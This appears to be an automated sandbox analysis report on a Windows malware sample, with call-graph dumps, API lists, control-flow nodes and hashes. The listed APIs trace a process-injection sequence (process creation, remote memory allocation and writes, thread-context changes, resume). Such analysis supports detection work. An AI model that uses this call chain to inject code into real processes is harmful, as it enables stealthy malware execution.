33500->33565 33569 eb908f5 33500->33569 33573 eb90495 33500->33573 33577 eb90292 33500->33577 33581 eb90570 33500->33581 33585 eb9083e 33500->33585 33589 eb9037e 33500->33589 33593 eb904bf 33500->33593 33600 eb9041c 33500->33600 33605 70de618 33519->33605 33523 eb903ab 33522->33523 33524 eb903bf 33523->33524 33609 70de130 33523->33609 33524->33501 33527 eb90102 33526->33527 33613 70dee70 33527->33613 33528 eb907e1 33529 eb90263 33529->33528 33531 70debe8 WriteProcessMemory 33529->33531 33530 eb9045f 33530->33501 33531->33530 33534 eb90288 33533->33534 33534->33533 33535 eb9062a 33534->33535 33617 70deb28 33534->33617 33541 eb90073 33537->33541 33538 eb90187 33538->33501 33539 eb907e1 33540 eb90263 33540->33539 33621 70debe8 33540->33621 33541->33538 33543 70dee70 CreateProcessA 33541->33543 33543->33540 33547 eb90073 33545->33547 33546 eb90187 33546->33501 33547->33546 33551 70dee70 CreateProcessA 33547->33551 33548 eb907e1 33549 eb90263 33549->33548 33552 70debe8 WriteProcessMemory 33549->33552 33550 eb9045f 33550->33501 33551->33549 33552->33550 33555 eb90102 33553->33555 33554 eb90187 33554->33501 33555->33554 33559 70dee70 CreateProcessA 33555->33559 33556 eb907e1 33557 eb90263 33557->33556 33560 70debe8 WriteProcessMemory 33557->33560 33558 eb9045f 33558->33501 33559->33557 33560->33558 33562 eb903ab 33561->33562 33564 70de130 ResumeThread 33562->33564 33563 eb903bf 33563->33501 33564->33563 33566 eb90bff 33565->33566 33625 70decd8 33566->33625 33570 eb908b1 33569->33570 33570->33569 33571 eb905d1 33570->33571 33572 70debe8 WriteProcessMemory 33570->33572 33572->33570 33574 eb90498 33573->33574 33576 70debe8 WriteProcessMemory 33574->33576 33575 eb9045f 33575->33501 33576->33575 33578 eb90288 33577->33578 33579 eb9062a 33578->33579 33580 70deb28 VirtualAllocEx 33578->33580 33580->33578 33582 eb904eb 33581->33582 33583 eb9045f 33582->33583 33584 70debe8 WriteProcessMemory 33582->33584 33583->33501 33584->33583 33587 eb9084b 33585->33587 33586 eb905d1 33587->33586 33588 70debe8 WriteProcessMemory 33587->33588 33588->33587 33590 eb903aa 33589->33590 33592 70de130 ResumeThread 33590->33592 33591 eb903bf 33591->33501 33592->33591 33594 eb904cc 33593->33594 33596 eb903aa 33593->33596 33595 eb903bf 33594->33595 33629 eb90ec8 33594->33629 33633 eb90ec6 33594->33633 33595->33501 33596->33595 33599 70de130 ResumeThread 33596->33599 33599->33595 33604 70debe8 WriteProcessMemory 33600->33604 33601 eb9062a 33602 eb90288 33602->33601 33603 70deb28 VirtualAllocEx 33602->33603 33603->33602 33604->33602 33606 70de65d Wow64SetThreadContext 33605->33606 33608 70de6a5 33606->33608 33610 70de170 ResumeThread 33609->33610 33612 70de1a1 33610->33612 33612->33524 33614 70deef9 CreateProcessA 33613->33614 33616 70df0bb 33614->33616 33618 70deb68 VirtualAllocEx 33617->33618 33620 70deba5 33618->33620 33620->33534 33622 70dec30 WriteProcessMemory 33621->33622 33624 70dec87 33622->33624 33624->33501 33626 70ded23 ReadProcessMemory 33625->33626 33628 70ded67 33626->33628 33630 eb90edd 33629->33630 33632 70de618 Wow64SetThreadContext 33630->33632 33631 eb90ef3 33631->33596 33632->33631 33634 eb90edd 33633->33634 33636 70de618 Wow64SetThreadContext 33634->33636 33635 eb90ef3 33635->33596 33636->33635 33452 15baf58 33453 15baf9a 33452->33453 33454 15bafa0 GetModuleHandleW 33452->33454 33453->33454 33455 15bafcd 33454->33455 33647 15b4668 33648 15b4672 33647->33648 33650 15b4767 33647->33650 33651 15b477d 33650->33651 33655 15b4868 33651->33655 33659 15b4867 33651->33659 33657 15b488f 33655->33657 33656 15b496c 33656->33656 33657->33656 33663 15b44b0 33657->33663 33660 15b488f 33659->33660 33661 15b44b0 CreateActCtxA 33660->33661 33662 15b496c 33660->33662 33661->33662 33664 15b58f8 CreateActCtxA 33663->33664 33666 15b59bb 33664->33666 33667 78040b8 33668 7803468 DrawTextExW 33667->33668 33670 78040f7 33667->33670 33668->33670 33669 7803528 DrawTextExW 33673 7804205 33669->33673 33670->33669 33672 78040fb 33670->33672 33671 7804261 33673->33671 33674 7804366 33673->33674 33675 780437b 33673->33675 33680 78020a4 33674->33680 33677 78020a4 3 API calls 33675->33677 33679 780438a 33677->33679 33682 78020af 33680->33682 33681 7804371 33682->33681 33685 78050d0 33682->33685 33691 78050bf 33682->33691 33686 78050ea 33685->33686 33697 78020cc 33685->33697 33688 78050f7 33686->33688 33689 780510f CreateIconFromResourceEx 33686->33689 33688->33681 33690 780519e 33689->33690 33690->33681 33692 78020cc CreateIconFromResourceEx 33691->33692 33693 78050ea 33692->33693 33694 78050f7 33693->33694 33695 780510f CreateIconFromResourceEx 33693->33695 33694->33681 33696 780519e 33695->33696 33696->33681 33698 7805120 CreateIconFromResourceEx 33697->33698 33699 780519e 33698->33699 33699->33686 33700 7809af8 33701 7809b0a 33700->33701 33702 7809b1b 33701->33702 33710 70d0b4d 33701->33710 33715 70d1c82 33701->33715 33720 70d0e0b 33701->33720 33725 70d1179 33701->33725 33731 70d0aee 33701->33731 33736 70d09fe 33701->33736 33741 70d046c 33701->33741 33746 70d2778 33710->33746 33749 70d2770 33710->33749 33752 70d2827 33710->33752 33711 70d0b5e 33717 70d2778 VirtualProtect 33715->33717 33718 70d2827 VirtualProtect 33715->33718 33719 70d2770 VirtualProtect 33715->33719 33716 70d1c96 33717->33716 33718->33716 33719->33716 33722 70d2778 VirtualProtect 33720->33722 33723 70d2827 VirtualProtect 33720->33723 33724 70d2770 VirtualProtect 33720->33724 33721 70d0e1f 33722->33721 33723->33721 33724->33721 33726 70d117c 33725->33726 33727 70d11e1 33726->33727 33728 70d2778 VirtualProtect 33726->33728 33729 70d2827 VirtualProtect 33726->33729 33730 70d2770 VirtualProtect 33726->33730 33728->33726 33729->33726 33730->33726 33733 70d2778 VirtualProtect 33731->33733 33734 70d2827 VirtualProtect 33731->33734 33735 70d2770 VirtualProtect 33731->33735 33732 70d0b05 33733->33732 33734->33732 33735->33732 33738 70d2778 VirtualProtect 33736->33738 33739 70d2827 VirtualProtect 33736->33739 33740 70d2770 VirtualProtect 33736->33740 33737 70d0a15 33738->33737 33739->33737 33740->33737 33743 70d2778 VirtualProtect 33741->33743 33744 70d2827 VirtualProtect 33741->33744 33745 70d2770 VirtualProtect 33741->33745 33742 70d049d 33743->33742 33744->33742 33745->33742 33747 70d27c0 VirtualProtect 33746->33747 33748 70d27fa 33747->33748 33748->33711 33750 70d27c0 VirtualProtect 33749->33750 33751 70d27fa 33750->33751 33751->33711 33753 70d27ac VirtualProtect 33752->33753 33756 70d282b 33752->33756 33755 70d27fa 33753->33755 33755->33711 33756->33711 33456 15bd650 DuplicateHandle 33457 15bd6e6 33456->33457 33637 15bd000 33638 15bd046 GetCurrentProcess 33637->33638 33640 15bd098 GetCurrentThread 33638->33640 33641 15bd091 33638->33641 33642 15bd0ce 33640->33642 33643 15bd0d5 GetCurrentProcess 33640->33643 33641->33640 33642->33643 33646 15bd10b 33643->33646 33644 15bd133 GetCurrentThreadId 33645 15bd164 33644->33645 33646->33644 33458 70d2880 33459 70d28a7 33458->33459 33463 70d2b58 33459->33463 33469 70d2b4b 33459->33469 33460 70d291e 33464 70d2b7f 33463->33464 33465 70d2dac 33464->33465 33475 eb90f10 33464->33475 33480 eb90f37 33464->33480 33485 eb90f00 33464->33485 33465->33460 33471 70d2b7f 33469->33471 33470 70d2dac 33470->33460 33471->33470 33472 eb90f10 2 API calls 33471->33472 33473 eb90f00 2 API calls 33471->33473 33474 eb90f37 2 API calls 33471->33474 33472->33471 33473->33471 33474->33471 33476 eb90f11 33475->33476 33478 eb90f30 33476->33478 33479 eb90f37 2 API calls 33476->33479 33490 eb90f78 33476->33490 33478->33464 33479->33478 33481 eb90f11 33480->33481 33482 eb90f30 33481->33482 33483 eb90f78 2 API calls 33481->33483 33484 eb90f37 2 API calls 33481->33484 33482->33464 33483->33482 33484->33482 33486 eb90f19 33485->33486 33487 eb90f30 33486->33487 33488 eb90f78 2 API calls 33486->33488 33489 eb90f37 2 API calls 33486->33489 33487->33464 33488->33487 33489->33487 33491 eb90f51 33490->33491 33492 eb90f7b 33490->33492 33491->33478 33492->33491 33495 eb91208 PostMessageW 33492->33495 33497 eb91200 PostMessageW 33492->33497 33496 eb91274 33495->33496 33496->33492 33498 eb91274 33497->33498 33498->33492

                                                Executed Functions

                                                Function 015BCFF1 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 015BD07E
                                                • GetCurrentThread.KERNEL32 ref: 015BD0BB
                                                • GetCurrentProcess.KERNEL32 ref: 015BD0F8
                                                • GetCurrentThreadId.KERNEL32 ref: 015BD151
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2199756369.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_15b0000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: ed148ef010c443faf3c0d6064212f5f11b33a633ecafa9c34da4740e0a0183f3
                                                • Instruction ID: d2ed6833ae1a271476f957185ca7646ea80650d71bf19162d0f8c293e9b2712d
                                                • Opcode Fuzzy Hash: ed148ef010c443faf3c0d6064212f5f11b33a633ecafa9c34da4740e0a0183f3
                                                • Instruction Fuzzy Hash: D35148B09007498FDB14CFA9D588BEEBBF1BF88318F20C459D009A7260D7756944CB65
                                                Function 015BD000 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 015BD07E
                                                • GetCurrentThread.KERNEL32 ref: 015BD0BB
                                                • GetCurrentProcess.KERNEL32 ref: 015BD0F8
                                                • GetCurrentThreadId.KERNEL32 ref: 015BD151
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2199756369.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_15b0000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 760a50ca5130c3041cdf481b0d4155c53c6264f9d4cb37283bb5e5ffbc01386d
                                                • Instruction ID: f26995baa815e554137e10c14539f1206e505876a7aad364099b4643d14e2548
                                                • Opcode Fuzzy Hash: 760a50ca5130c3041cdf481b0d4155c53c6264f9d4cb37283bb5e5ffbc01386d
                                                • Instruction Fuzzy Hash: 555136B090074A8FDB14CFAAD588BDEBBF1BF88318F20C459D509A7250DB756984CB65
                                                Function 070DEE70 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 270 70dee70-70def05 272 70def3e-70def5e 270->272 273 70def07-70def11 270->273 278 70def97-70defc6 272->278 279 70def60-70def6a 272->279 273->272 274 70def13-70def15 273->274 276 70def38-70def3b 274->276 277 70def17-70def21 274->277 276->272 280 70def25-70def34 277->280 281 70def23 277->281 287 70defff-70df0b9 CreateProcessA 278->287 288 70defc8-70defd2 278->288 279->278 283 70def6c-70def6e 279->283 280->280 282 70def36 280->282 281->280 282->276 284 70def91-70def94 283->284 285 70def70-70def7a 283->285 284->278 289 70def7c 285->289 290 70def7e-70def8d 285->290 301 70df0bb-70df0c1 287->301 302 70df0c2-70df148 287->302 288->287 291 70defd4-70defd6 288->291 289->290 290->290 292 70def8f 290->292 293 70deff9-70deffc 291->293 294 70defd8-70defe2 291->294 292->284 293->287 296 70defe4 294->296 297 70defe6-70deff5 294->297 296->297 297->297 298 70deff7 297->298 298->293 301->302 312 70df158-70df15c 302->312 313 70df14a-70df14e 302->313 315 70df16c-70df170 312->315 316 70df15e-70df162 312->316 313->312 314 70df150 313->314 314->312 318 70df180-70df184 315->318 319 70df172-70df176 315->319 316->315 317 70df164 316->317 317->315 321 70df196-70df19d 318->321 322 70df186-70df18c 318->322 319->318 320 70df178 319->320 320->318 323 70df19f-70df1ae 321->323 324 70df1b4 321->324 322->321 323->324
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 070DF0A6
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2203852929.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_70d0000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 6994d61f4814e8bcf2a420f260a649db7fdca92028a65d36d0b87d09eb551ce8
                                                • Instruction ID: 6c765bb56d6ee3386c806becb1ecafbe332ffd5064d6a6b39f1eb7766e9bf521
                                                • Opcode Fuzzy Hash: 6994d61f4814e8bcf2a420f260a649db7fdca92028a65d36d0b87d09eb551ce8
                                                • Instruction Fuzzy Hash: AD912AB1D0031ADFEB24DF68C8417EEBAF2BF48310F548669E859A7240DB749985CF91
                                                Function 015B44B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 326 15b44b0-15b59b9 CreateActCtxA 329 15b59bb-15b59c1 326->329 330 15b59c2-15b5a1c 326->330 329->330 337 15b5a2b-15b5a2f 330->337 338 15b5a1e-15b5a21 330->338 339 15b5a31-15b5a3d 337->339 340 15b5a40 337->340 338->337 339->340 342 15b5a41 340->342 342->342
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 015B59A9
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2199756369.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_15b0000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: c83c625069e1af2bdcb6e132141acf8077a4b62a5f5992d03a8380b1aeded5ff
                                                • Instruction ID: 65414a76185d0bc3f9141a1a06fcafcc3e36cfa1e7d37a6955d4c665775e2b0a
                                                • Opcode Fuzzy Hash: c83c625069e1af2bdcb6e132141acf8077a4b62a5f5992d03a8380b1aeded5ff
                                                • Instruction Fuzzy Hash: F541CF70C10719CBEB24DFA9C984BDEBBB5BF89304F20806AD509AB251DBB56945CF90
                                                Function 078050D0 Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 343 78050d0-78050e2 344 78050ea-78050f5 343->344 345 78050e5 call 78020cc 343->345 346 78050f7-7805107 344->346 347 780510a-780519c CreateIconFromResourceEx 344->347 345->344 350 78051a5-78051c2 347->350 351 780519e-78051a4 347->351 351->350
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2204789724.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_7800000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: CreateFromIconResource
                                                • String ID:
                                                • API String ID: 3668623891-0
                                                • Opcode ID: bf0adf35029d833e0abb57bb5aae2c845bf32c79476178e9d680db3ad9f4242a
                                                • Instruction ID: 738b22f06813afee06134974a27b4240a0253d60c1e622883c4c49570b5ab45c
                                                • Opcode Fuzzy Hash: bf0adf35029d833e0abb57bb5aae2c845bf32c79476178e9d680db3ad9f4242a
                                                • Instruction Fuzzy Hash: A53167B2900349DFDB11CFA9C844A9ABFF8EF09310F14845AEA54E7261C3759864CFA1
                                                Function 0780207C Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 354 780207c-7804024 356 7804026-780402c 354->356 357 780402f-780403e 354->357 356->357 358 7804040 357->358 359 7804043-780407c DrawTextExW 357->359 358->359 360 7804085-78040a2 359->360 361 780407e-7804084 359->361 361->360
                                                APIs
                                                • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07803FBD,?,?), ref: 0780406F
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2204789724.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_7800000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: DrawText
                                                • String ID:
                                                • API String ID: 2175133113-0
                                                • Opcode ID: 44159875919d15846ef1762083ea7b8225b2e8cf03935df35cf76f271fc06467
                                                • Instruction ID: 6f697d8bb17ba2822bf009bed681af5568c1735c94ee7241b9ed26879d84687b
                                                • Opcode Fuzzy Hash: 44159875919d15846ef1762083ea7b8225b2e8cf03935df35cf76f271fc06467
                                                • Instruction Fuzzy Hash: 013104B5D002499FCB50CF9AD8846AEFBF4FF58310F14842AE919A7250D775A944CFA0
                                                Function 070DEBE8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 364 70debe8-70dec36 366 70dec38-70dec44 364->366 367 70dec46-70dec85 WriteProcessMemory 364->367 366->367 369 70dec8e-70decbe 367->369 370 70dec87-70dec8d 367->370 370->369
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 070DEC78
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2203852929.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_70d0000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 6a697437800440ae1a85e92803c104f22e483396aebec460a4aac8e8b43868a7
                                                • Instruction ID: cd058c1320203b2cc60a75aa33a2ecb8e38fc08b7b392ea2cd6c9292b14cbb4b
                                                • Opcode Fuzzy Hash: 6a697437800440ae1a85e92803c104f22e483396aebec460a4aac8e8b43868a7
                                                • Instruction Fuzzy Hash: 832126B19003499FDB10CFA9C981BDEBBF5FF48310F108529E919A7240D7789950CBA5
                                                Function 07803FD1 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 374 7803fd1-7804024 375 7804026-780402c 374->375 376 780402f-780403e 374->376 375->376 377 7804040 376->377 378 7804043-780407c DrawTextExW 376->378 377->378 379 7804085-78040a2 378->379 380 780407e-7804084 378->380 380->379
                                                APIs
                                                • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07803FBD,?,?), ref: 0780406F
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2204789724.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_7800000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: DrawText
                                                • String ID:
                                                • API String ID: 2175133113-0
                                                • Opcode ID: 3571699f7be430f406452fab70bd62f27795ba444dd50a3a05085562d384605e
                                                • Instruction ID: b33883cb67f6f157caaf90ff54fcdd779e75bd4cec53c9bc172cab3b3c1b4ede
                                                • Opcode Fuzzy Hash: 3571699f7be430f406452fab70bd62f27795ba444dd50a3a05085562d384605e
                                                • Instruction Fuzzy Hash: F821F2B5D0024A9FDB50CF99D9806DEFBF4BF58320F24842AE919A7350D775A944CFA0
                                                Function 070D2827 Relevance: 1.6, APIs: 1, Instructions: 65memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 388 70d2827-70d2829 389 70d27ac-70d27f8 VirtualProtect 388->389 390 70d282b-70d2850 388->390 393 70d27fa-70d2800 389->393 394 70d2801-70d2822 389->394 395 70d2857-70d286c 390->395 396 70d2852 390->396 393->394 396->395
                                                APIs
                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 070D27EB
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2203852929.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_70d0000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: c750de4f8dbacbfc6d779f2742a428dd73382ec7cc3259b1d9d9b8ae478d8c2e
                                                • Instruction ID: bd7b5e4349bfc60ed103caf14ba879ebcb357dd42df6976e68bbbb6aff358511
                                                • Opcode Fuzzy Hash: c750de4f8dbacbfc6d779f2742a428dd73382ec7cc3259b1d9d9b8ae478d8c2e
                                                • Instruction Fuzzy Hash: 1A21A1B69003499FCF11CFA9C940BDEBBF0BF49320F10825AE858A7251D3359A55DF61
                                                Function 015BD648 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 383 15bd648-15bd6e4 DuplicateHandle 384 15bd6ed-15bd70a 383->384 385 15bd6e6-15bd6ec 383->385 385->384
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015BD6D7
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2199756369.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_15b0000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: fe6aece2cd4e7e74eca5e1fbbc25162683adcf8c2fce8c330cefc99b1c02454c
                                                • Instruction ID: 7e6fd529ab0d9bcc58d2f600bbae3562b0c12afd1fefa26127960da9ee9e68f3
                                                • Opcode Fuzzy Hash: fe6aece2cd4e7e74eca5e1fbbc25162683adcf8c2fce8c330cefc99b1c02454c
                                                • Instruction Fuzzy Hash: F32103B5900249DFDB10CFAAD585AEEBFF5FB48324F24801AE958A7310C379A941CF64
                                                Function 070DE618 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 399 70de618-70de663 401 70de665-70de671 399->401 402 70de673-70de6a3 Wow64SetThreadContext 399->402 401->402 404 70de6ac-70de6dc 402->404 405 70de6a5-70de6ab 402->405 405->404
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 070DE696
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2203852929.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_70d0000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 595200b3342b9b691f5d614c2f85a2c52e75637911300ae2b5e32edbd0753366
                                                • Instruction ID: 40475b029427d8b5356f1d83af160182c8999643e9055dfdf55f2d8190b29f70
                                                • Opcode Fuzzy Hash: 595200b3342b9b691f5d614c2f85a2c52e75637911300ae2b5e32edbd0753366
                                                • Instruction Fuzzy Hash: 3F2147B1D003098FDB10DFAAC4857EEBBF4EF88364F14842AD519A7240CB78A944CFA5
                                                Function 070DECD8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                Download Yara Rule
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 070DED58
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2203852929.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_70d0000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 9e993803742b2a488f6d6432b534600bb8231901190809956ad0c89248387deb
                                                • Instruction ID: 6bce89e9277f4fb26c69bf776a036777be88d83fcf52af9212322d6be6590764
                                                • Opcode Fuzzy Hash: 9e993803742b2a488f6d6432b534600bb8231901190809956ad0c89248387deb
                                                • Instruction Fuzzy Hash: 5D2116B18003599FDB10CFAAC881BEEBBF5FF48310F148429E519A7250C7799910CBA5
                                                Function 015BD650 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015BD6D7
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2199756369.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_15b0000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 6ffabbb1ab90a30c3717424ddba7554e1c08d1d4f57a102e9b48ac27783ed715
                                                • Instruction ID: fb8c6d35e064a91d0ee1d724365a2a82db798f70faff44aff712fffc22d6f2dd
                                                • Opcode Fuzzy Hash: 6ffabbb1ab90a30c3717424ddba7554e1c08d1d4f57a102e9b48ac27783ed715
                                                • Instruction Fuzzy Hash: 9821E3B59002099FDB10CF9AD984ADEBBF8FB48324F14841AE918A7210D374A950CF64
                                                Function 078020CC Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,078050EA,?,?,?,?,?), ref: 0780518F
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2204789724.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_7800000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: CreateFromIconResource
                                                • String ID:
                                                • API String ID: 3668623891-0
                                                • Opcode ID: 3cfa36848344b130fc313926f9ffd6306db2b9dad012453ca5320adcedeab2a1
                                                • Instruction ID: ac791194c1452cf1a7061e194c1b86f59530dd27b896075839bc3cd1f3bfae22
                                                • Opcode Fuzzy Hash: 3cfa36848344b130fc313926f9ffd6306db2b9dad012453ca5320adcedeab2a1
                                                • Instruction Fuzzy Hash: ED1129B680024D9FDB10CF9AC844BDEBFF8EB48320F14841AE554A7250D375A954CFA4
                                                Function 070D2778 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 070D27EB
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2203852929.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_70d0000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: da783537e2d8f094b64bca861c16e2c547cd37c9513d0953d0a494170aae6b25
                                                • Instruction ID: de429229431141fe670a4ac13906ef8ffd60084924e977e3f4e19f281b23b6cd
                                                • Opcode Fuzzy Hash: da783537e2d8f094b64bca861c16e2c547cd37c9513d0953d0a494170aae6b25
                                                • Instruction Fuzzy Hash: C721C2B59003499FDB10CF9AC984BDEFBF8BB48320F108429E958A7250D379A944CFA5
                                                Function 070D2770 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 070D27EB
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2203852929.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_70d0000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 38d553c641097d32a8bd6832175fab202122017d70931a5bc7dc66717f2f2822
                                                • Instruction ID: 59f00aa92bf897e704e1ebc4d8afe3b75e7ebd6458a12a5001ee0dcb946d7d67
                                                • Opcode Fuzzy Hash: 38d553c641097d32a8bd6832175fab202122017d70931a5bc7dc66717f2f2822
                                                • Instruction Fuzzy Hash: 9F21E5B590024A9FDB10CF9AC585BDEFBF4BB48320F10846AE558A3250D374A944CF61
                                                Function 070DEB28 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 070DEB96
                                                Memory Dump Source
